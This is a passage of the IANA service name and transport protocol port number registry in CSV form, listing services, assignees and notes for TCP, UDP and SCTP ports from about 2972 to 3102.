daemon,[Rudi_Chiarito],[Rudi_Chiarito],,,,,, pmsm-webrctl,2972,tcp,PMSM Webrctl,[Markus_Michels],[Markus_Michels],,,,,, pmsm-webrctl,2972,udp,PMSM Webrctl,[Markus_Michels],[Markus_Michels],,,,,, svnetworks,2973,tcp,SV Networks,[Sylvia_Siu_2],[Sylvia_Siu_2],,,,,, svnetworks,2973,udp,SV Networks,[Sylvia_Siu_2],[Sylvia_Siu_2],,,,,, signal,2974,tcp,Signal,[Wyatt_Williams],[Wyatt_Williams],,,,,, signal,2974,udp,Signal,[Wyatt_Williams],[Wyatt_Williams],,,,,, fjmpcm,2975,tcp,Fujitsu Configuration Management Service,[Hiroki_Kawano],[Hiroki_Kawano],,,,,, fjmpcm,2975,udp,Fujitsu Configuration Management Service,[Hiroki_Kawano],[Hiroki_Kawano],,,,,, cns-srv-port,2976,tcp,CNS Server Port,[Ram_Golla],[Ram_Golla],,,,,, cns-srv-port,2976,udp,CNS Server Port,[Ram_Golla],[Ram_Golla],,,,,, ttc-etap-ns,2977,tcp,TTCs Enterprise Test Access Protocol - NS,,,,,,,, ttc-etap-ns,2977,udp,TTCs Enterprise Test Access Protocol - NS,,,,,,,, ttc-etap-ds,2978,tcp,TTCs Enterprise Test Access Protocol - DS,[Daniel_Becker_2],[Daniel_Becker_2],,,,,, ttc-etap-ds,2978,udp,TTCs Enterprise Test Access Protocol - DS,[Daniel_Becker_2],[Daniel_Becker_2],,,,,, h263-video,2979,tcp,H.263 Video Streaming,[Jauvane_C_de_Olivei],[Jauvane_C_de_Olivei],,,,,, h263-video,2979,udp,H.263 Video Streaming,[Jauvane_C_de_Olivei],[Jauvane_C_de_Olivei],,,,,, wimd,2980,tcp,Instant Messaging Service,[Kevin_Birch],[Kevin_Birch],,,,,, wimd,2980,udp,Instant Messaging Service,[Kevin_Birch],[Kevin_Birch],,,,,, mylxamport,2981,tcp,MYLXAMPORT,[Wei_Gao],[Wei_Gao],,,,,, mylxamport,2981,udp,MYLXAMPORT,[Wei_Gao],[Wei_Gao],,,,,, iwb-whiteboard,2982,tcp,IWB-WHITEBOARD,[David_W_Radcliffe],[David_W_Radcliffe],,,,,, iwb-whiteboard,2982,udp,IWB-WHITEBOARD,[David_W_Radcliffe],[David_W_Radcliffe],,,,,, netplan,2983,tcp,NETPLAN,[Thomas_Driemeyer],[Thomas_Driemeyer],,,,,, netplan,2983,udp,NETPLAN,[Thomas_Driemeyer],[Thomas_Driemeyer],,,,,, hpidsadmin,2984,tcp,HPIDSADMIN,,,,,,,, hpidsadmin,2984,udp,HPIDSADMIN,,,,,,,, hpidsagent,2985,tcp,HPIDSAGENT,[John_Trudeau],[John_Trudeau],,,,,, hpidsagent,2985,udp,HPIDSAGENT,[John_Trudeau],[John_Trudeau],,,,,, stonefalls,2986,tcp,STONEFALLS,[Scott_Grau],[Scott_Grau],,,,,, stonefalls,2986,udp,STONEFALLS,[Scott_Grau],[Scott_Grau],,,,,, identify,2987,tcp,identify,,,,,,,, identify,2987,udp,identify,,,,,,,, hippad,2988,tcp,HIPPA Reporting Protocol,[William_Randolph_Roy],[William_Randolph_Roy],,,,,, hippad,2988,udp,HIPPA Reporting Protocol,[William_Randolph_Roy],[William_Randolph_Roy],,,,,, zarkov,2989,tcp,ZARKOV Intelligent Agent Communication,[Robin_Felix],[Robin_Felix],,2014-02-17,,,, zarkov,2989,udp,ZARKOV Intelligent Agent Communication,[Robin_Felix],[Robin_Felix],,2014-02-17,,,, boscap,2990,tcp,BOSCAP,[Dirk_Hillbrecht],[Dirk_Hillbrecht],,,,,, boscap,2990,udp,BOSCAP,[Dirk_Hillbrecht],[Dirk_Hillbrecht],,,,,, wkstn-mon,2991,tcp,WKSTN-MON,[William_David],[William_David],,,,,, wkstn-mon,2991,udp,WKSTN-MON,[William_David],[William_David],,,,,, avenyo,2992,tcp,Avenyo Server,[Bodo_Rueskamp],[Bodo_Rueskamp],,,,,, avenyo,2992,udp,Avenyo Server,[Bodo_Rueskamp],[Bodo_Rueskamp],,,,,, veritas-vis1,2993,tcp,VERITAS VIS1,,,,,,,, veritas-vis1,2993,udp,VERITAS VIS1,,,,,,,, veritas-vis2,2994,tcp,VERITAS VIS2,[Dinkar_Chivaluri],[Dinkar_Chivaluri],,,,,, veritas-vis2,2994,udp,VERITAS VIS2,[Dinkar_Chivaluri],[Dinkar_Chivaluri],,,,,, idrs,2995,tcp,IDRS,[Jeff_Eaton],[Jeff_Eaton],,,,,, idrs,2995,udp,IDRS,[Jeff_Eaton],[Jeff_Eaton],,,,,, vsixml,2996,tcp,vsixml,[Rob_Juergens],[Rob_Juergens],,,,,, vsixml,2996,udp,vsixml,[Rob_Juergens],[Rob_Juergens],,,,,, rebol,2997,tcp,REBOL,[Holger_Kruse],[Holger_Kruse],,,,,, rebol,2997,udp,REBOL,[Holger_Kruse],[Holger_Kruse],,,,,, realsecure,2998,tcp,Real Secure,[Wes_Wilson],[Wes_Wilson],,,,,, realsecure,2998,udp,Real Secure,[Wes_Wilson],[Wes_Wilson],,,,,, remoteware-un,2999,tcp,RemoteWare Unassigned,[Tim_Farley],[Tim_Farley],,,,,, remoteware-un,2999,udp,RemoteWare Unassigned,[Tim_Farley],[Tim_Farley],,,,,, hbci,3000,tcp,HBCI,[Kurt_Haubner],[Kurt_Haubner],,,,,, hbci,3000,udp,HBCI,[Kurt_Haubner],[Kurt_Haubner],,,,,, remoteware-cl,3000,tcp,RemoteWare Client,[Tim_Farley],[Tim_Farley],,,,,,This entry records an unassigned but widespread use remoteware-cl,3000,udp,RemoteWare Client,[Tim_Farley],[Tim_Farley],,,,,,This entry records an unassigned but widespread use origo-native,3001,tcp,OrigoDB Server Native Interface,[Devrex_Labs],[Robert_Friberg],,2013-03-29,,,,"port 3001 previously ""Removed on 2006-05-25""" ,3001,udp,Reserved,,,,2013-03-29,,,,"port 3001 previously ""Removed on 2006-05-25""" exlm-agent,3002,tcp,EXLM Agent,[Randy_Martin],[Randy_Martin],,,,,, exlm-agent,3002,udp,EXLM Agent,[Randy_Martin],[Randy_Martin],,,,,, remoteware-srv,3002,tcp,RemoteWare Server,[Tim_Farley],[Tim_Farley],,,,,,This entry records an unassigned but widespread use remoteware-srv,3002,udp,RemoteWare Server,[Tim_Farley],[Tim_Farley],,,,,,This entry records an unassigned but widespread use cgms,3003,tcp,CGMS,[Corey_Clinton],[Corey_Clinton],2011-02-02,,,,, cgms,3003,udp,CGMS,[Corey_Clinton],[Corey_Clinton],2011-02-02,,,,, csoftragent,3004,tcp,Csoft Agent,[Nedelcho_Stanev_2],[Nedelcho_Stanev_2],,,,,, csoftragent,3004,udp,Csoft Agent,[Nedelcho_Stanev_2],[Nedelcho_Stanev_2],,,,,, geniuslm,3005,tcp,Genius License Manager,[Jakob_Spies],[Jakob_Spies],,,,,, geniuslm,3005,udp,Genius License Manager,[Jakob_Spies],[Jakob_Spies],,,,,, ii-admin,3006,tcp,Instant Internet Admin,[Lewis_Donzis],[Lewis_Donzis],,,,,, ii-admin,3006,udp,Instant Internet Admin,[Lewis_Donzis],[Lewis_Donzis],,,,,, lotusmtap,3007,tcp,Lotus Mail Tracking Agent Protocol,[Ken_Lin],[Ken_Lin],,,,,, lotusmtap,3007,udp,Lotus Mail Tracking Agent Protocol,[Ken_Lin],[Ken_Lin],,,,,, midnight-tech,3008,tcp,Midnight Technologies,[Kyle_Unice],[Kyle_Unice],,,,,, midnight-tech,3008,udp,Midnight Technologies,[Kyle_Unice],[Kyle_Unice],,,,,, pxc-ntfy,3009,tcp,PXC-NTFY,[Takeshi_Nishizawa],[Takeshi_Nishizawa],,,,,, pxc-ntfy,3009,udp,PXC-NTFY,[Takeshi_Nishizawa],[Takeshi_Nishizawa],,,,,, gw,3010,tcp,Telerate Workstation,,,,,,,, ping-pong,3010,udp,Telerate Workstation,[Timo_Sivonen],[Timo_Sivonen],,,,,, trusted-web,3011,tcp,Trusted Web,,,,,,,, trusted-web,3011,udp,Trusted Web,,,,,,,, twsdss,3012,tcp,Trusted Web Client,[Alex_Duncan],[Alex_Duncan],,,,,, twsdss,3012,udp,Trusted Web Client,[Alex_Duncan],[Alex_Duncan],,,,,, gilatskysurfer,3013,tcp,Gilat Sky Surfer,[Yossi_Gal],[Yossi_Gal],,,,,, gilatskysurfer,3013,udp,Gilat Sky Surfer,[Yossi_Gal],[Yossi_Gal],,,,,, broker-service,3014,tcp,"Broker Service IANA assigned this well-formed service name as a replacement for ""broker_service"".",[Dale_Bethers],[Dale_Bethers],,,,,, broker_service,3014,tcp,Broker Service,[Dale_Bethers],[Dale_Bethers],,,,,,"This entry is an alias to ""broker-service"". This entry is now historic, not usable for use with many common service discovery mechanisms." broker-service,3014,udp,"Broker Service IANA assigned this well-formed service name as a replacement for ""broker_service"".",[Dale_Bethers],[Dale_Bethers],,,,,, broker_service,3014,udp,Broker Service,[Dale_Bethers],[Dale_Bethers],,,,,,"This entry is an alias to ""broker-service"". This entry is now historic, not usable for use with many common service discovery mechanisms." nati-dstp,3015,tcp,NATI DSTP,[Paul_Austin],[Paul_Austin],,,,,, nati-dstp,3015,udp,NATI DSTP,[Paul_Austin],[Paul_Austin],,,,,, notify-srvr,3016,tcp,"Notify Server IANA assigned this well-formed service name as a replacement for ""notify_srvr"".",[Hugo_Parra],[Hugo_Parra],,,,,, notify_srvr,3016,tcp,Notify Server,[Hugo_Parra],[Hugo_Parra],,,,,,"This entry is an alias to ""notify-srvr"". This entry is now historic, not usable for use with many common service discovery mechanisms." notify-srvr,3016,udp,"Notify Server IANA assigned this well-formed service name as a replacement for ""notify_srvr"".",[Hugo_Parra],[Hugo_Parra],,,,,, notify_srvr,3016,udp,Notify Server,[Hugo_Parra],[Hugo_Parra],,,,,,"This entry is an alias to ""notify-srvr"". This entry is now historic, not usable for use with many common service discovery mechanisms." event-listener,3017,tcp,"Event Listener IANA assigned this well-formed service name as a replacement for ""event_listener"".",[Ted_Tronson],[Ted_Tronson],,,,,, event_listener,3017,tcp,Event Listener,[Ted_Tronson],[Ted_Tronson],,,,,,"This entry is an alias to ""event-listener"". This entry is now historic, not usable for use with many common service discovery mechanisms." event-listener,3017,udp,"Event Listener IANA assigned this well-formed service name as a replacement for ""event_listener"".",[Ted_Tronson],[Ted_Tronson],,,,,, event_listener,3017,udp,Event Listener,[Ted_Tronson],[Ted_Tronson],,,,,,"This entry is an alias to ""event-listener"". This entry is now historic, not usable for use with many common service discovery mechanisms." srvc-registry,3018,tcp,"Service Registry IANA assigned this well-formed service name as a replacement for ""srvc_registry"".",[Mark_Killgore],[Mark_Killgore],,,,,, srvc_registry,3018,tcp,Service Registry,[Mark_Killgore],[Mark_Killgore],,,,,,"This entry is an alias to ""srvc-registry"". This entry is now historic, not usable for use with many common service discovery mechanisms." srvc-registry,3018,udp,"Service Registry IANA assigned this well-formed service name as a replacement for ""srvc_registry"".",[Mark_Killgore],[Mark_Killgore],,,,,, srvc_registry,3018,udp,Service Registry,[Mark_Killgore],[Mark_Killgore],,,,,,"This entry is an alias to ""srvc-registry"". This entry is now historic, not usable for use with many common service discovery mechanisms." resource-mgr,3019,tcp,"Resource Manager IANA assigned this well-formed service name as a replacement for ""resource_mgr"".",[Gary_Glover],[Gary_Glover],,,,,, resource_mgr,3019,tcp,Resource Manager,[Gary_Glover],[Gary_Glover],,,,,,"This entry is an alias to ""resource-mgr"". This entry is now historic, not usable for use with many common service discovery mechanisms." resource-mgr,3019,udp,"Resource Manager IANA assigned this well-formed service name as a replacement for ""resource_mgr"".",[Gary_Glover],[Gary_Glover],,,,,, resource_mgr,3019,udp,Resource Manager,[Gary_Glover],[Gary_Glover],,,,,,"This entry is an alias to ""resource-mgr"". This entry is now historic, not usable for use with many common service discovery mechanisms." cifs,3020,tcp,CIFS,[Paul_Leach],[Paul_Leach],,,,,, cifs,3020,udp,CIFS,[Paul_Leach],[Paul_Leach],,,,,, agriserver,3021,tcp,AGRI Server,[Frank_Neulichedl],[Frank_Neulichedl],,,,,, agriserver,3021,udp,AGRI Server,[Frank_Neulichedl],[Frank_Neulichedl],,,,,, csregagent,3022,tcp,CSREGAGENT,[Nedelcho_Stanev],[Nedelcho_Stanev],,,,,, csregagent,3022,udp,CSREGAGENT,[Nedelcho_Stanev],[Nedelcho_Stanev],,,,,, magicnotes,3023,tcp,magicnotes,[Karl_Edwall],[Karl_Edwall],,,,,, magicnotes,3023,udp,magicnotes,[Karl_Edwall],[Karl_Edwall],,,,,, nds-sso,3024,tcp,"NDS_SSO IANA assigned this well-formed service name as a replacement for ""nds_sso"".",[Mel_Oyler],[Mel_Oyler],,,,,, nds_sso,3024,tcp,NDS_SSO,[Mel_Oyler],[Mel_Oyler],,,,,,"This entry is an alias to ""nds-sso"". This entry is now historic, not usable for use with many common service discovery mechanisms." nds-sso,3024,udp,"NDS_SSO IANA assigned this well-formed service name as a replacement for ""nds_sso"".",[Mel_Oyler],[Mel_Oyler],,,,,, nds_sso,3024,udp,NDS_SSO,[Mel_Oyler],[Mel_Oyler],,,,,,"This entry is an alias to ""nds-sso"". This entry is now historic, not usable for use with many common service discovery mechanisms." arepa-raft,3025,tcp,Arepa Raft,[Stuart_Schaefer],[Stuart_Schaefer],,,,,, arepa-raft,3025,udp,Arepa Raft,[Stuart_Schaefer],[Stuart_Schaefer],,,,,, agri-gateway,3026,tcp,AGRI Gateway,[Agri_Datalog],[Agri_Datalog],,,,,, agri-gateway,3026,udp,AGRI Gateway,[Agri_Datalog],[Agri_Datalog],,,,,, LiebDevMgmt-C,3027,tcp,"LiebDevMgmt_C IANA assigned this well-formed service name as a replacement for ""LiebDevMgmt_C"".",,,,,,,, LiebDevMgmt_C,3027,tcp,LiebDevMgmt_C,,,,,,,,"This entry is an alias to ""LiebDevMgmt-C"". This entry is now historic, not usable for use with many common service discovery mechanisms." LiebDevMgmt-C,3027,udp,"LiebDevMgmt_C IANA assigned this well-formed service name as a replacement for ""LiebDevMgmt_C"".",,,,,,,, LiebDevMgmt_C,3027,udp,LiebDevMgmt_C,,,,,,,,"This entry is an alias to ""LiebDevMgmt-C"". This entry is now historic, not usable for use with many common service discovery mechanisms." LiebDevMgmt-DM,3028,tcp,"LiebDevMgmt_DM IANA assigned this well-formed service name as a replacement for ""LiebDevMgmt_DM"".",,,,,,,, LiebDevMgmt_DM,3028,tcp,LiebDevMgmt_DM,,,,,,,,"This entry is an alias to ""LiebDevMgmt-DM"". This entry is now historic, not usable for use with many common service discovery mechanisms." LiebDevMgmt-DM,3028,udp,"LiebDevMgmt_DM IANA assigned this well-formed service name as a replacement for ""LiebDevMgmt_DM"".",,,,,,,, LiebDevMgmt_DM,3028,udp,LiebDevMgmt_DM,,,,,,,,"This entry is an alias to ""LiebDevMgmt-DM"". This entry is now historic, not usable for use with many common service discovery mechanisms." LiebDevMgmt-A,3029,tcp,"LiebDevMgmt_A IANA assigned this well-formed service name as a replacement for ""LiebDevMgmt_A"".",[Mike_Velten],[Mike_Velten],,,,,, LiebDevMgmt_A,3029,tcp,LiebDevMgmt_A,[Mike_Velten],[Mike_Velten],,,,,,"This entry is an alias to ""LiebDevMgmt-A"". This entry is now historic, not usable for use with many common service discovery mechanisms." LiebDevMgmt-A,3029,udp,"LiebDevMgmt_A IANA assigned this well-formed service name as a replacement for ""LiebDevMgmt_A"".",[Mike_Velten],[Mike_Velten],,,,,, LiebDevMgmt_A,3029,udp,LiebDevMgmt_A,[Mike_Velten],[Mike_Velten],,,,,,"This entry is an alias to ""LiebDevMgmt-A"". This entry is now historic, not usable for use with many common service discovery mechanisms." arepa-cas,3030,tcp,Arepa Cas,[Stuart_Schaefer],[Stuart_Schaefer],,,,,, arepa-cas,3030,udp,Arepa Cas,[Stuart_Schaefer],[Stuart_Schaefer],,,,,, eppc,3031,tcp,Remote AppleEvents/PPC Toolbox,[Steve_Zellers],[Steve_Zellers],,,,,, eppc,3031,udp,Remote AppleEvents/PPC Toolbox,[Steve_Zellers],[Steve_Zellers],,,,,, redwood-chat,3032,tcp,Redwood Chat,[Songwon_Chi],[Songwon_Chi],,,,,, redwood-chat,3032,udp,Redwood Chat,[Songwon_Chi],[Songwon_Chi],,,,,, pdb,3033,tcp,PDB,[Don_Bowman],[Don_Bowman],,,,,, pdb,3033,udp,PDB,[Don_Bowman],[Don_Bowman],,,,,, osmosis-aeea,3034,tcp,Osmosis / Helix (R) AEEA Port,[Larry_Atkin],[Larry_Atkin],,,,,, osmosis-aeea,3034,udp,Osmosis / Helix (R) AEEA Port,[Larry_Atkin],[Larry_Atkin],,,,,, fjsv-gssagt,3035,tcp,FJSV gssagt,[Tomoji_Koike],[Tomoji_Koike],,,,,, fjsv-gssagt,3035,udp,FJSV gssagt,[Tomoji_Koike],[Tomoji_Koike],,,,,, hagel-dump,3036,tcp,Hagel DUMP,[Haim_Gelfenbeyn],[Haim_Gelfenbeyn],,,,,, hagel-dump,3036,udp,Hagel DUMP,[Haim_Gelfenbeyn],[Haim_Gelfenbeyn],,,,,, hp-san-mgmt,3037,tcp,HP SAN Mgmt,[Steve_Britt],[Steve_Britt],,,,,, hp-san-mgmt,3037,udp,HP SAN Mgmt,[Steve_Britt],[Steve_Britt],,,,,, santak-ups,3038,tcp,Santak UPS,[Tom_Liu],[Tom_Liu],,,,,, santak-ups,3038,udp,Santak UPS,[Tom_Liu],[Tom_Liu],,,,,, cogitate,3039,tcp,"Cogitate, Inc.",[Jim_Harlan],[Jim_Harlan],,,,,, cogitate,3039,udp,"Cogitate, Inc.",[Jim_Harlan],[Jim_Harlan],,,,,, tomato-springs,3040,tcp,Tomato Springs,[Jack_Waller_III],[Jack_Waller_III],,,,,, tomato-springs,3040,udp,Tomato Springs,[Jack_Waller_III],[Jack_Waller_III],,,,,, di-traceware,3041,tcp,di-traceware,[Carlos_Hung],[Carlos_Hung],,,,,, di-traceware,3041,udp,di-traceware,[Carlos_Hung],[Carlos_Hung],,,,,, journee,3042,tcp,journee,[Kevin_Calman],[Kevin_Calman],,,,,, journee,3042,udp,journee,[Kevin_Calman],[Kevin_Calman],,,,,, brp,3043,tcp,Broadcast Routing Protocol,[John_Border],[John_Border],,,,,, brp,3043,udp,Broadcast Routing Protocol,[John_Border],[John_Border],,,,,, epp,3044,tcp,EndPoint Protocol,[Stephen_Cipolli],[Stephen_Cipolli],,,,,, epp,3044,udp,EndPoint Protocol,[Stephen_Cipolli],[Stephen_Cipolli],,,,,, responsenet,3045,tcp,ResponseNet,[Chul_Yoon],[Chul_Yoon],,,,,, responsenet,3045,udp,ResponseNet,[Chul_Yoon],[Chul_Yoon],,,,,, di-ase,3046,tcp,di-ase,[Carlos_Hung],[Carlos_Hung],,,,,, di-ase,3046,udp,di-ase,[Carlos_Hung],[Carlos_Hung],,,,,, hlserver,3047,tcp,Fast Security HL Server,[Safenet_Inc.],[Michael_Zunke_3],,2014-07-02,,,, hlserver,3047,udp,Fast Security HL Server,[Safenet_Inc.],[Michael_Zunke_3],,2014-07-02,,,, pctrader,3048,tcp,Sierra Net PC Trader,[Chris_Hahn],[Chris_Hahn],,,,,, pctrader,3048,udp,Sierra Net PC Trader,[Chris_Hahn],[Chris_Hahn],,,,,, nsws,3049,tcp,NSWS,[Ray_Gwinn],[Ray_Gwinn],,,,,, nsws,3049,udp,NSWS,[Ray_Gwinn],[Ray_Gwinn],,,,,, gds-db,3050,tcp,"gds_db IANA assigned this well-formed service name as a replacement for ""gds_db"".",[Madhukar_N_Thakur],[Madhukar_N_Thakur],,,,,, gds_db,3050,tcp,gds_db,[Madhukar_N_Thakur],[Madhukar_N_Thakur],,,,,,"This entry is an alias to ""gds-db"". This entry is now historic, not usable for use with many common service discovery mechanisms." gds-db,3050,udp,"gds_db IANA assigned this well-formed service name as a replacement for ""gds_db"".",[Madhukar_N_Thakur],[Madhukar_N_Thakur],,,,,, gds_db,3050,udp,gds_db,[Madhukar_N_Thakur],[Madhukar_N_Thakur],,,,,,"This entry is an alias to ""gds-db"". This entry is now historic, not usable for use with many common service discovery mechanisms." galaxy-server,3051,tcp,Galaxy Server,[Michael_Andre],[Michael_Andre],,,,,, galaxy-server,3051,udp,Galaxy Server,[Michael_Andre],[Michael_Andre],,,,,, apc-3052,3052,tcp,APC 3052,[American_Power_Conve],[American_Power_Conve],,,,,, apc-3052,3052,udp,APC 3052,[American_Power_Conve],[American_Power_Conve],,,,,, dsom-server,3053,tcp,dsom-server,[Daniel_Sisk],[Daniel_Sisk],,,,,, dsom-server,3053,udp,dsom-server,[Daniel_Sisk],[Daniel_Sisk],,,,,, amt-cnf-prot,3054,tcp,AMT CNF PROT,[Marco_Marcucci],[Marco_Marcucci],,,,,, amt-cnf-prot,3054,udp,AMT CNF PROT,[Marco_Marcucci],[Marco_Marcucci],,,,,, policyserver,3055,tcp,Policy Server,[Mark_Garti],[Mark_Garti],,,,,, policyserver,3055,udp,Policy Server,[Mark_Garti],[Mark_Garti],,,,,, cdl-server,3056,tcp,CDL Server,[Paul_Roberts],[Paul_Roberts],,,,,, cdl-server,3056,udp,CDL Server,[Paul_Roberts],[Paul_Roberts],,,,,, goahead-fldup,3057,tcp,GoAhead FldUp,[Alan_Pickrell],[Alan_Pickrell],,,,,, goahead-fldup,3057,udp,GoAhead FldUp,[Alan_Pickrell],[Alan_Pickrell],,,,,, videobeans,3058,tcp,videobeans,[Hiroyuki_Takahashi],[Hiroyuki_Takahashi],,,,,, videobeans,3058,udp,videobeans,[Hiroyuki_Takahashi],[Hiroyuki_Takahashi],,,,,, qsoft,3059,tcp,qsoft,[James_Kunz],[James_Kunz],,,,,, qsoft,3059,udp,qsoft,[James_Kunz],[James_Kunz],,,,,, interserver,3060,tcp,interserver,[Madhukar_N_Thakur],[Madhukar_N_Thakur],,,,,Known Unauthorized Use on port 3060, interserver,3060,udp,interserver,[Madhukar_N_Thakur],[Madhukar_N_Thakur],,,,,Known Unauthorized Use on port 3060, cautcpd,3061,tcp,cautcpd,,,,,,,, cautcpd,3061,udp,cautcpd,,,,,,,, ncacn-ip-tcp,3062,tcp,ncacn-ip-tcp,,,,,,,, ncacn-ip-tcp,3062,udp,ncacn-ip-tcp,,,,,,,, ncadg-ip-udp,3063,tcp,ncadg-ip-udp,[Gabi_Kalmar],[Gabi_Kalmar],,,,,, ncadg-ip-udp,3063,udp,ncadg-ip-udp,[Gabi_Kalmar],[Gabi_Kalmar],,,,,, rprt,3064,tcp,Remote Port Redirector,[Robin_Johnston],[Robin_Johnston],,,,,, rprt,3064,udp,Remote Port Redirector,[Robin_Johnston],[Robin_Johnston],,,,,, slinterbase,3065,tcp,slinterbase,[Bie_Tie],[Bie_Tie],,,,,, slinterbase,3065,udp,slinterbase,[Bie_Tie],[Bie_Tie],,,,,, netattachsdmp,3066,tcp,NETATTACHSDMP,[Mike_Young],[Mike_Young],,,,,, netattachsdmp,3066,udp,NETATTACHSDMP,[Mike_Young],[Mike_Young],,,,,, fjhpjp,3067,tcp,FJHPJP,[Ryozo_Furutani],[Ryozo_Furutani],,,,,, fjhpjp,3067,udp,FJHPJP,[Ryozo_Furutani],[Ryozo_Furutani],,,,,, ls3bcast,3068,tcp,ls3 Broadcast,,,,,,,, ls3bcast,3068,udp,ls3 Broadcast,,,,,,,, ls3,3069,tcp,ls3,[Jim_Thompson],[Jim_Thompson],,,,,, ls3,3069,udp,ls3,[Jim_Thompson],[Jim_Thompson],,,,,, mgxswitch,3070,tcp,MGXSWITCH,[George_Walter],[George_Walter],,,,,, mgxswitch,3070,udp,MGXSWITCH,[George_Walter],[George_Walter],,,,,, csd-mgmt-port,3071,tcp,ContinuStor Manager Port,,,,,,,, csd-mgmt-port,3071,udp,ContinuStor Manager Port,,,,,,,, csd-monitor,3072,tcp,ContinuStor Monitor Port,[Ray_Jantz],[Ray_Jantz],,,,,, csd-monitor,3072,udp,ContinuStor Monitor Port,[Ray_Jantz],[Ray_Jantz],,,,,, vcrp,3073,tcp,Very simple chatroom prot,[Andreas_Wurf],[Andreas_Wurf],,,,,, vcrp,3073,udp,Very simple chatroom prot,[Andreas_Wurf],[Andreas_Wurf],,,,,, xbox,3074,tcp,Xbox game port,[Damon_Danieli],[Damon_Danieli],,,,,, xbox,3074,udp,Xbox game port,[Damon_Danieli],[Damon_Danieli],,,,,, orbix-locator,3075,tcp,Orbix 2000 Locator,,,,,,,, orbix-locator,3075,udp,Orbix 2000 Locator,,,,,,,, orbix-config,3076,tcp,Orbix 2000 Config,,,,,,,, orbix-config,3076,udp,Orbix 2000 Config,,,,,,,, orbix-loc-ssl,3077,tcp,Orbix 2000 Locator SSL,,,,,,,, orbix-loc-ssl,3077,udp,Orbix 2000 Locator SSL,,,,,,,, orbix-cfg-ssl,3078,tcp,Orbix 2000 Locator SSL,[Eric_Newcomer],[Eric_Newcomer],,,,,, orbix-cfg-ssl,3078,udp,Orbix 2000 Locator SSL,[Eric_Newcomer],[Eric_Newcomer],,,,,, lv-frontpanel,3079,tcp,LV Front Panel,[Darshan_Shah],[Darshan_Shah],,,,,, lv-frontpanel,3079,udp,LV Front Panel,[Darshan_Shah],[Darshan_Shah],,,,,, stm-pproc,3080,tcp,"stm_pproc IANA assigned this well-formed service name as a replacement for ""stm_pproc"".",[Paul_McGinnis],[Paul_McGinnis],,,,,, stm_pproc,3080,tcp,stm_pproc,[Paul_McGinnis],[Paul_McGinnis],,,,,,"This entry is an alias to ""stm-pproc"". This entry is now historic, not usable for use with many common service discovery mechanisms." stm-pproc,3080,udp,"stm_pproc IANA assigned this well-formed service name as a replacement for ""stm_pproc"".",[Paul_McGinnis],[Paul_McGinnis],,,,,, stm_pproc,3080,udp,stm_pproc,[Paul_McGinnis],[Paul_McGinnis],,,,,,"This entry is an alias to ""stm-pproc"". This entry is now historic, not usable for use with many common service discovery mechanisms." tl1-lv,3081,tcp,TL1-LV,,,,,,,, tl1-lv,3081,udp,TL1-LV,,,,,,,, tl1-raw,3082,tcp,TL1-RAW,,,,,,,, tl1-raw,3082,udp,TL1-RAW,,,,,,,, tl1-telnet,3083,tcp,TL1-TELNET,[SONET_Internetworkin],[SONET_Internetworkin],,,,,, tl1-telnet,3083,udp,TL1-TELNET,[SONET_Internetworkin],[SONET_Internetworkin],,,,,, itm-mccs,3084,tcp,ITM-MCCS,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, itm-mccs,3084,udp,ITM-MCCS,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, pcihreq,3085,tcp,PCIHReq,[Paul_Sanders],[Paul_Sanders],,,,,, pcihreq,3085,udp,PCIHReq,[Paul_Sanders],[Paul_Sanders],,,,,, jdl-dbkitchen,3086,tcp,JDL-DBKitchen,[Hideo_Wakabayashi],[Hideo_Wakabayashi],,,,,, jdl-dbkitchen,3086,udp,JDL-DBKitchen,[Hideo_Wakabayashi],[Hideo_Wakabayashi],,,,,, asoki-sma,3087,tcp,Asoki SMA,[Andrew_Mossberg],[Andrew_Mossberg],,,,,, asoki-sma,3087,udp,Asoki SMA,[Andrew_Mossberg],[Andrew_Mossberg],,,,,, xdtp,3088,tcp,eXtensible Data Transfer Protocol,[Michael_Shearson],[Michael_Shearson],,,,,, xdtp,3088,udp,eXtensible Data Transfer Protocol,[Michael_Shearson],[Michael_Shearson],,,,,, ptk-alink,3089,tcp,ParaTek Agent Linking,[Robert_Hodgson_2],[Robert_Hodgson_2],,,,,, ptk-alink,3089,udp,ParaTek Agent Linking,[Robert_Hodgson_2],[Robert_Hodgson_2],,,,,, stss,3090,tcp,Senforce Session Services,[Peter_Boucher],[Peter_Boucher],,,,,, stss,3090,udp,Senforce Session Services,[Peter_Boucher],[Peter_Boucher],,,,,, 1ci-smcs,3091,tcp,1Ci Server Management,[Ralf_Bensmann],[Ralf_Bensmann],,,,,, 1ci-smcs,3091,udp,1Ci Server Management,[Ralf_Bensmann],[Ralf_Bensmann],,,,,, ,3092,,Unassigned,,,,2008-04-22,,,, rapidmq-center,3093,tcp,Jiiva RapidMQ Center,,,,,,,, rapidmq-center,3093,udp,Jiiva RapidMQ Center,,,,,,,, rapidmq-reg,3094,tcp,Jiiva RapidMQ Registry,[Mark_Ericksen],[Mark_Ericksen],,,,,, rapidmq-reg,3094,udp,Jiiva RapidMQ Registry,[Mark_Ericksen],[Mark_Ericksen],,,,,, panasas,3095,tcp,Panasas rendevous port,[Peter_Berger],[Peter_Berger],,,,,, panasas,3095,udp,Panasas rendevous port,[Peter_Berger],[Peter_Berger],,,,,, ndl-aps,3096,tcp,Active Print Server Port,[Martin_Norman],[Martin_Norman],,,,,, ndl-aps,3096,udp,Active Print Server Port,[Martin_Norman],[Martin_Norman],,,,,, ,3097,tcp,Reserved,,,,,,,, ,3097,udp,Reserved,,,,,,,, itu-bicc-stc,3097,sctp,ITU-T Q.1902.1/Q.2150.3,[Greg_Sidebottom],[Greg_Sidebottom],,,,,, umm-port,3098,tcp,Universal Message Manager,[Phil_Braham],[Phil_Braham],,,,,, umm-port,3098,udp,Universal Message Manager,[Phil_Braham],[Phil_Braham],,,,,, chmd,3099,tcp,CHIPSY Machine Daemon,[Trond_Borsting],[Trond_Borsting],,,,,, chmd,3099,udp,CHIPSY Machine Daemon,[Trond_Borsting],[Trond_Borsting],,,,,, opcon-xps,3100,tcp,OpCon/xps,[David_Bourland],[David_Bourland],,,,,, opcon-xps,3100,udp,OpCon/xps,[David_Bourland],[David_Bourland],,,,,, hp-pxpib,3101,tcp,HP PolicyXpert PIB Server,[Brian_O_Keefe],[Brian_O_Keefe],,,,,, hp-pxpib,3101,udp,HP PolicyXpert PIB Server,[Brian_O_Keefe],[Brian_O_Keefe],,,,,, slslavemon,3102,tcp,SoftlinK Slave Mon Port,[Moshe_Livne],[Moshe_Livne],,,,,, slslavemon,3102,udp,SoftlinK Slave Mon 